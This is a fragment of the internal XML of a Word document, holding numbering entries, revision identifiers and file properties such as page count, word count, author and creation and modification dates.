    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="773551852">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="504824347">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="45683124">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1981180500">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1435593551">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1992829186">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="260646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C86"/>
    <w:rsid w:val="000F0C8D"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="002E5977"/>
    <w:rsid w:val="003146E6"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003652B6"/>
    <w:rsid w:val="00380547"/>
    <w:rsid w:val="003C1AEE"/>
    <w:rsid w:val="004040FA"/>
    <w:rsid w:val="00510F35"/>
    <w:rsid w:val="005E022B"/>
    <w:rsid w:val="005F2C74"/>
    <w:rsid w:val="006128E9"/>
    <w:rsid w:val="006825B4"/>
    <w:rsid w:val="006D3220"/>
    <w:rsid w:val="00711FBD"/>
    <w:rsid w:val="00763427"/>
    <w:rsid w:val="007C6A8D"/>
    <w:rsid w:val="009670C9"/>
    <w:rsid w:val="00984D42"/>
    <w:rsid w:val="009B64F5"/>
    <w:rsid w:val="00A31589"/>
    <w:rsid w:val="00A41BCD"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BC35B3"/>
    <w:rsid w:val="00BE564F"/>
    <w:rsid w:val="00C6133F"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CF14E5"/>
    <w:rsid w:val="00D40799"/>
    <w:rsid w:val="00DA4D14"/>
    <w:rsid w:val="00FC50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799C9D"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{90707207-C05C-48B2-8BE9-EA497EF9C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F2B97E-76D6-44E1-9062-F580658FC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16</Pages>
  <Words>1313</Words>
  <Characters>7486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 Van Phuc D22AT03</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T01:25:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>